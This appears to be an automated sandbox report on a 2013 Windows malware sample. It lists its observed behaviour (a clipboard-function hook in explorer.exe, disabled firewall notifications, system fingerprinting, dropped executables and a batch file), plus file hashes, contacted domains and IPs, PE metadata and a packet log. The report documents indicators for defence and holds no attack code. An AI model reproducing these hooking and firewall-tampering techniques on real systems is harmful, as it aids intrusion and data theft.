Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dfengh.exe	File deleted: c:\9f68ae8267182bf1be4e5bb6c75022b8.exe
Modifies the prolog of user mode functions (user mode inline hooks)		Show sources
Source: explorer.exe	User mode code has chanced: module: USER32.dll function: GetClipboardData new code: 0xE9 0x9C 0xC7 0x7F 0xF3 0x33

Lowering of HIPS / PFW / Operating System Security Settings:

Modifies the windows firewall			Show sources
Source: C:\WINDOWS\explorer.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile DisableNotifications

Language, Device and Operating System Detection:

Contains functionality to query local / system time		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Code function: 2_2_0351E8DB GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,	2_2_0351E8DB
Contains functionality to query the account / user name		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Code function: 2_2_00FCAB81 GetModuleFileNameW,GetCommandLineW,GetUserNameExW,GetProcessTimes,GetUserDefaultUILanguage,memcpy,memcpy,memcpy,memcpy,	2_2_00FCAB81
Contains functionality to query time zone information		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Code function: 2_2_00FCAA04 GetTickCount,GetLastInputInfo,GetLocalTime,GetTimeZoneInformation,	2_2_00FCAA04
Contains functionality to query windows version		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Code function: 2_2_00FEBC3E memcpy,memset,GetComputerNameW,GetVersionExW,memset,memset,memset,	2_2_00FEBC3E
Queries the cryptographic machine GUID		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Queries the installation date of Windows		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Registry key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Queries the installation date of Windows		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the product ID of Windows		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
Queries the volume information (name, serial number etc) of a device		Show sources
Source: C:\WINDOWS\system32\cmd.exe	Qeruies volume information: C:\ VolumeInformation

Screenshot

Startup

system is xp 9f68ae8267182bf1be4e5bb6c75022b8.exe (PID: 1476 MD5: 9F68AE8267182BF1BE4E5BB6C75022B8) dfengh.exe (PID: 1700 MD5: 31A061B9C2661D02C88C04887651AA53) bfsrfgs.exe (PID: 1632 MD5: CE82CCE381074ABA34C76B7929CBCC29) yxufa.exe (PID: 908 MD5: 80E258A5B4707BDC9674627FAADD86A4) explorer.exe (PID: 1548 MD5: 12896823FB95BFB3DC9B46BCAEDC9923) ctfmon.exe (PID: 1732 MD5: 5F1D5F88303D4A4DBC8E5F97BA967CC3) wscntfy.exe (PID: 1640 MD5: F92E1076C42FCD6DB3D72D8CFE9816D5) cmd.exe (PID: 116 cmdline: C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SMNBD85.bat MD5: 6D778E0F95447E6546553EEEA709D03C) cleanup

system is xp

9f68ae8267182bf1be4e5bb6c75022b8.exe (PID: 1476 MD5: 9F68AE8267182BF1BE4E5BB6C75022B8)

dfengh.exe (PID: 1700 MD5: 31A061B9C2661D02C88C04887651AA53)

bfsrfgs.exe (PID: 1632 MD5: CE82CCE381074ABA34C76B7929CBCC29)

yxufa.exe (PID: 908 MD5: 80E258A5B4707BDC9674627FAADD86A4)

explorer.exe (PID: 1548 MD5: 12896823FB95BFB3DC9B46BCAEDC9923)

ctfmon.exe (PID: 1732 MD5: 5F1D5F88303D4A4DBC8E5F97BA967CC3)

wscntfy.exe (PID: 1640 MD5: F92E1076C42FCD6DB3D72D8CFE9816D5)

cmd.exe (PID: 116 cmdline: C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SMNBD85.bat MD5: 6D778E0F95447E6546553EEEA709D03C)

cleanup

Created / dropped Files

File Path	Hashes
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Cab1.tmp	MD5: F581048AA8697DA74A9BE736B6035542 SHA: 9EA06E2F446782EA60D685520FC38891FB6B8332 SHA-256: 8A2B17AC9DCC076AB307854E79854F7906C68A50C8865B289F848341D90750A8 SHA-512: E24BB92B27FD97A6409DE096714EE59FAB6B82A5BB72E1DBE92EA7E97324ABD6C64C8584C62E2AC9830700461F05014210B9FC148AB01ECE178DCEA1F0A2D546
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Cab3.tmp	MD5: F581048AA8697DA74A9BE736B6035542 SHA: 9EA06E2F446782EA60D685520FC38891FB6B8332 SHA-256: 8A2B17AC9DCC076AB307854E79854F7906C68A50C8865B289F848341D90750A8 SHA-512: E24BB92B27FD97A6409DE096714EE59FAB6B82A5BB72E1DBE92EA7E97324ABD6C64C8584C62E2AC9830700461F05014210B9FC148AB01ECE178DCEA1F0A2D546
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Cab5.tmp	MD5: C63ADFC2FEEB9A8816F2B38C118B4746 SHA: 3CAE38AB276501F2998191C71F1A91EEAF1D44C6 SHA-256: 9728D8F82A9AA5B4DA3AF6E41A08E5499AE3B86EA62E1F78AD0B3CDD097B98AF SHA-512: 4EA126FB85B23FE15A938E8603D6846F2AEDC32559B69B65CD179940C5052BE9C8FBA720DEDD893D4E8C5863C3CF0204F985A7662F4D11205DBCBD1934AC74CB
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SMNBD85.bat	MD5: 998324858FD4FAA8CAFE0AEACD175503 SHA: 9710787CA0327281EBE2F3680FA0B261CEE690CA SHA-256: 6237917EF03361468925539A3BB22F3F384762F959C697935F654A2E148D79B4 SHA-512: 5BFB927F3217988F7F0A18AA4A6F6FF3214DAA049D095ACB04C259B946E56719A3AA05C8465E9DAD8C62AA6A7CE304764CF317C8C4AA5F69291489EEB5CD49BD
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Tar2.tmp	MD5: EF9FB765C2D58205E6DCB7BC9B1ED954 SHA: AD09FD6B5F537A5ED6654B5AA3C0B84A9107BB7B SHA-256: 0CB216D73402ACE7B2F15F2F7D0D81A464EFC2732EDB001FA6F9A28EAF972BB4 SHA-512: E1D552D75996BDEB625BC70FBA6880EA5A6C9D780AFB328228F97418B54F377B37DC4EECAE95A346FAB610B3EBFFB8B85FC986BFA5B602ABEE381DE70AB3BA2F
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Tar4.tmp	MD5: EF9FB765C2D58205E6DCB7BC9B1ED954 SHA: AD09FD6B5F537A5ED6654B5AA3C0B84A9107BB7B SHA-256: 0CB216D73402ACE7B2F15F2F7D0D81A464EFC2732EDB001FA6F9A28EAF972BB4 SHA-512: E1D552D75996BDEB625BC70FBA6880EA5A6C9D780AFB328228F97418B54F377B37DC4EECAE95A346FAB610B3EBFFB8B85FC986BFA5B602ABEE381DE70AB3BA2F
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Tar6.tmp	MD5: 9A0E6AFE423E553B8CF32F1023086A0E SHA: 749E3771C9E5D6999B03A4419A4CD9A754F9FC7B SHA-256: 0C4A1F19CC6E73CEE61EC72F1072820FDE95CEE341B1D54979B83FF22678BFA3 SHA-512: 3CADD0B44CC473747E9B0016623A89D52CE0469B3D329F087527B5516E99A0256E6964554875F697E3AC1E2D44572B5FF5C6E10C78377B33F40C7E757FC86DEC
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	MD5: CE82CCE381074ABA34C76B7929CBCC29 SHA: AB7DBC122116F137330EE6FA1CFA81BC4897B1EC SHA-256: FA40B8757D9EC792F3090DFB647812E128B66E09ADC5C6C5D733AD69D890DC5A SHA-512: A672CAE1DDFC9351E5297D8559E1C9727E5C1C562FEC8E80457D4EBCC7C34464DE2CCF39147D3A656BE87BA4B1F7F21659AD0156864D224FA38081854CE09773
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dfengh.exe	MD5: 31A061B9C2661D02C88C04887651AA53 SHA: 41D2167C45A0AD7BC3EC9D550661CD9A26860436 SHA-256: A4AD7A0BAD422CA82DA3A07421953EDBFEEAC6E2759222744AB758FF4B1D3EB7 SHA-512: 157F67116B8D0053582D4D310426EF29E382E3A76F39C9EA5ADE38733BDD74C45E138A028C9DDAD1CC031C6437F1E2BB225B058728A6B33D88399616AFE691A7
C:\Documents and Settings\Administrator\Application Data\Microsoft\Address Book\Administrator.wab	MD5: 02962AB958FD8410CA1B04F6E17678D4 SHA: FCA7F88477EC587D7DB697D0304B2CD4C866589E SHA-256: FFCDD9AB874B1D78AC8ADD26AF64C4F30F5D15FCC95313E5D4AA8779A50EB142 SHA-512: 19866C137DC835737C3E50A0168BD6FA254496147DB6A7003C2319EDF02733D64D19C1479B6B035D8C6BBC3D13A1A80E287829960CAB4544CFC79A3A7A2C4678
C:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004	MD5: 75D5804AECBAFD2AF943D4DE036A46AE SHA: 53D118F68432F40A70788C610ABE235BF80EDC19 SHA-256: 8A3F0B8CF35F5D87647745E1073ADC1C09D418957BB34BB45914BDC2CDB0294E SHA-512: 932D3268807604939853FCB798F1A48B6814290AF9A77F6B713F02EDB926213FEA9C84B131F59D6F27AA115E770B8475746B6D299DCA3D2777B857447B1F016F
C:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\3B6E683A7A45CC59BF035C9BA8C7AB9D	MD5: 9E3F33A494B8AF3BC1E899A54C90AF3C SHA: 33019A7FB34E4C2B366FD7A58CFC0B9397761261 SHA-256: 7C3845673E448A6EFADAAB0EAF49AD7B18782CA9971A7E61FB28652A57B1A21C SHA-512: 49A95634042C7ECC82A67608E3C1850FED37F68755B81A0878E7FA71884ACF53035F97AB62228AA0F8B8A181DDF7F4DF9695885BD29BAEF43AAD0B726DE2D298
C:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\56C1FDF96B4236A573C8DF6802435A5D	MD5: 84D69BB9690DF14BD01CE47C2529BE50 SHA: 141ADA2B39B5864EB072610E1B941F679843B077 SHA-256: DEC8F5F72512713B78688FE19269AB3D061D92CBE8A99EBEDDE1A0EF78514F6A SHA-512: 23DDA4C458D82F58A22FCBC8B61DA4F4A2EF51DB5D623767DA58D15B32472D076DD27D895296CF840FAD5F7C319B472E6001C59C2CF482E6E35B815E71CF33C5
C:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015	MD5: C63ADFC2FEEB9A8816F2B38C118B4746 SHA: 3CAE38AB276501F2998191C71F1A91EEAF1D44C6 SHA-256: 9728D8F82A9AA5B4DA3AF6E41A08E5499AE3B86EA62E1F78AD0B3CDD097B98AF SHA-512: 4EA126FB85B23FE15A938E8603D6846F2AEDC32559B69B65CD179940C5052BE9C8FBA720DEDD893D4E8C5863C3CF0204F985A7662F4D11205DBCBD1934AC74CB
C:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004	MD5: 79965792D39752F8123544787E0D8468 SHA: D12037C177D0220AE1DBF9EDC4E875DFD55A3C7B SHA-256: 2271170ECD2B6BE1C8D7C976B78C00AD22D5AC393CD9A8E8C8F63F993B3EDEE7 SHA-512: 15DA0281FE4B1036ABBC873EF1D964EA6EEC07FC9B88861F42288A2640865D5C23B9EA4918A552AE31CF28265A6AF5810739CE776CE81E8252D9376BC5A1380F
C:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\3B6E683A7A45CC59BF035C9BA8C7AB9D	MD5: 57824D43574622136A16D215D0087950 SHA: 5B0811BCF4B64524B78F0883A3DACF08DE92A667 SHA-256: 6087CEAC9D6986C0A1980342862467F24A299D25BA4544578B009233044D5114 SHA-512: 89DA563BEE3DDEF867F88C8F18D6A81060A8D1D980463A052BF1D81BCE67F2CEA6086FA585F514977EB288D2711796A97B53E6FED82ABAF7B59203EE9F949C04
C:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\56C1FDF96B4236A573C8DF6802435A5D	MD5: CF4150664C96327E8D406F84812828F4 SHA: 664CF5F4472FCEB075BE07FAA386503CB3A3C480 SHA-256: 8669C4013F98317F45E098E84FF37164C1E9BC7032039CF5F052DEB2D89FDBF5 SHA-512: F39DCC89E57AEDBAE0AE9B0008C60E79B9BD46D851A6758B2B890C27268654EFA7984C544243A9AE391321A3B367D1658E05E64A2D511D8460944798756970F2
C:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015	MD5: 380671FE1F4D7F7ED28214B029F12C1F SHA: 695641ACECCEE7C9010170D2A3D5CBCA2129E17D SHA-256: B54155AC6399579BF700BCB11316DAAED08C2A4947E92A4A1F1C0791AD739188 SHA-512: 670A99B267D9AEAF951FF5662BCC82711BCF874CAC64D740969E87953FD0A0BA25D1EB1A33348CE74DBD3B649855E9CDEDF2CF2D6B5637072D65C301F3EC7CCF
C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	MD5: 80E258A5B4707BDC9674627FAADD86A4 SHA: 2EBC7F7F4B9204B41F1CC4EA5F461D732EB79A7B SHA-256: 7D904C091D97D15CDF3F6FA9E87F369AB66A1AA76A0BAEA38432A85E4AF0E7FC SHA-512: 083DFDB8A89B67C6817520073CBB916661CBC7BA94F11346D2ABFA58869A439C0F657B1AD29C0191E97398A6B9DD7DCA1DA406093E8755E3A51B07437BE6F2B9
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\5B7NHQO2\da[1].exe	MD5: CE82CCE381074ABA34C76B7929CBCC29 SHA: AB7DBC122116F137330EE6FA1CFA81BC4897B1EC SHA-256: FA40B8757D9EC792F3090DFB647812E128B66E09ADC5C6C5D733AD69D890DC5A SHA-512: A672CAE1DDFC9351E5297D8559E1C9727E5C1C562FEC8E80457D4EBCC7C34464DE2CCF39147D3A656BE87BA4B1F7F21659AD0156864D224FA38081854CE09773
\ROUTER	MD5: E62AF50E9DC6C765631B20C223C5A1D4 SHA: 78AF5EC66758B2128161D2EF516DB71208CC04DF SHA-256: EB6315D3D364C74C36BAB83ABD9A49CA5A3FD8653CCD0731986DE6A2C510DB6C SHA-512: AFA47A2FB0B5E33EE2A05BF5FB7498E3CD529C2EC1DD019F3BACE2035A0D712039DCE7D639F48DE2896DA8AB3665B83536C63A651C719BBF2925134F88A780C5

Contacted Domains

Name	IP	Name Server	Active	Registrar	e-Mail
gov-l.com	74.221.210.125	ns2.2ndry.com ns1.2ndry.com	true	ENOM, INC.	support@namecheap.com4fcd17888e73440e9c2b2db4f6d94a55.protect@whoisguard.com
crl.comodoca.com	178.255.83.2		true	unknown	unknown
crl.usertrust.com	178.255.83.2		true	unknown	unknown

Contacted IPs

IP	Country	Pingable	Open Ports
74.208.73.146	UNITED STATES	true	80 3389
24.107.136.226	UNITED STATES	false
71.61.76.222	UNITED STATES	false
86.131.235.103	UNITED KINGDOM	true
203.81.192.36	PAKISTAN	true	80 443 3389
178.255.83.2	UNITED KINGDOM	true	22 80 443
74.221.210.125	UNITED STATES	true	21 22 80 443
75.32.154.102	UNITED STATES	false
195.186.1.121	SWITZERLAND	false
98.95.183.150	UNITED STATES	false
85.100.41.9	TURKEY	true	80
98.81.0.25	UNITED STATES	false
184.144.14.69	CANADA	false
115.70.128.151	AUSTRALIA	false	21 3389
23.62.99.27	unknown	true	80 443
81.138.21.57	UNITED KINGDOM	true
131.175.68.35	ITALY	true
74.179.161.58	UNITED STATES	true

Static File Info

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
File name:	9f68ae8267182bf1be4e5bb6c75022b8
File size:	20992
MD5:	9f68ae8267182bf1be4e5bb6c75022b8
SHA1:	0057e87e96f0bc653021a340e3485e574c878906
SHA256:	f3e382b6dd99dbdef91a166791a54e10beb7d77f26291fcf59203ab444a1b2d1
SHA512:	fa1152a499a4117b5c061ad31504b38399f62f7839387311a22ef645987f993f4dc4b37c110bb8972abc042c4926f5dc75d2ed3ac6e6a0238d0acf779faf5846

Static PE Info

General
Entrypoint:	0x3501575
Entrypoint Section:	.text
Imagebase:	0x3500000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT, NO_SEH
Time Stamp:	0x52302D4D [Wed Sep 11 08:43:57 2013 UTC]
TLS Callbacks:
Digitally signed:	False

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x5100	0x2734	data	Russian	Russia
RT_STRING	0x7850	0x3c	data	Russian	Russia
RT_GROUP_ICON	0x7838	0x14	MS Windows icon resource - 1 icon	Russian	Russia

Imports

DLL	Import
Cabinet.dll
KERNEL32.dll	GetModuleHandleW, ExitProcess, GetLastError, CreateDirectoryW
USER32.dll	GetCursorInfo

Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy
.text	0x1000	0x2000	0x1400	5.43901506667
.rdata	0x3000	0x1000	0x800	4.41591669205
.data	0x4000	0x1000	0x800	3.39680851835
.rsrc	0x5000	0x2890	0x2a00	5.4264847342

Possible Origin

Language of compilation system	Country where language is spoken	Map
Russian	Russia

Network Behavior

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 23, 2013 11:35:21.052078962 CEST	60401	53	192.168.0.10	195.186.1.121
Sep 23, 2013 11:35:21.647824049 CEST	53	60401	195.186.1.121	192.168.0.10
Sep 23, 2013 11:35:21.658081055 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:21.658152103 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:21.658575058 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:21.670782089 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:21.670809031 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:22.656055927 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:22.762753963 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:22.763577938 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:22.763598919 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:22.764178991 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:22.775122881 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:22.775171995 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:23.640507936 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:23.848638058 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:26.182960987 CEST	50627	53	192.168.0.10	195.186.1.121
Sep 23, 2013 11:35:26.876286983 CEST	53	50627	195.186.1.121	192.168.0.10
Sep 23, 2013 11:35:26.882637978 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:26.882667065 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:26.883001089 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:26.885591984 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:26.885607004 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:28.317456961 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:28.442759991 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:28.621778965 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:28.621793985 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:29.860522032 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:29.884536982 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:29.885299921 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:29.885313034 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:29.885807991 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:29.906697989 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:29.906704903 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:29.907370090 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:29.918462038 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:29.919224024 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:29.919234037 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:29.919723988 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:30.033679962 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:30.147954941 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:30.148698092 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:30.148710966 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:30.149329901 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:30.169895887 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:30.169902086 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:30.170650959 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:30.214982986 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:30.215722084 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:30.215732098 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:30.216301918 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:30.265722036 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:30.274966002 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:30.275706053 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:30.275718927 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:30.276283026 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:30.344479084 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:30.450015068 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:30.450748920 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:30.450759888 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:30.451419115 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:30.461987019 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:30.489073038 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:30.489805937 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:30.489815950 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:30.490154028 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:30.629190922 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:30.664690018 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:30.665472984 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:30.665484905 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:30.666099072 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:30.699541092 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:30.699552059 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:30.700218916 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:30.789824963 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:30.790517092 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:30.790533066 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:30.790740967 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:30.817939997 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:30.818627119 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:30.818639040 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:30.819063902 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:30.825895071 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:30.825901031 CEST	80	1032	23.62.99.27	192.168.0.10
Sep 23, 2013 11:35:30.826558113 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:35:31.189676046 CEST	58910	53	192.168.0.10	195.186.1.121
Sep 23, 2013 11:35:31.811028004 CEST	53	58910	195.186.1.121	192.168.0.10
Sep 23, 2013 11:35:31.817414045 CEST	1033	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:31.817466974 CEST	80	1033	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:31.817827940 CEST	1033	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:31.820439100 CEST	1033	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:31.820465088 CEST	80	1033	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:32.782247066 CEST	80	1033	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:32.829495907 CEST	80	1033	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:32.830033064 CEST	1033	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:32.830920935 CEST	1033	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:32.906227112 CEST	52485	53	192.168.0.10	195.186.1.121
Sep 23, 2013 11:35:33.612063885 CEST	53	52485	195.186.1.121	192.168.0.10
Sep 23, 2013 11:35:33.620712042 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:33.620743036 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:33.621088028 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:33.624850988 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:33.624881029 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:34.788559914 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:34.839426994 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:34.840241909 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:34.840255022 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:34.840985060 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:34.900012970 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:34.945307970 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:34.946129084 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:34.946145058 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:34.946475029 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:34.989449024 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:34.991139889 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:34.991867065 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:34.991878986 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:34.992271900 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.048544884 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.124325991 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.125046015 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.125057936 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.125638008 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.164030075 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.164036989 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.164777040 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.180051088 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.180799961 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.180809975 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.181389093 CEST	1034	80	192.168.0.10	178.255.83.2
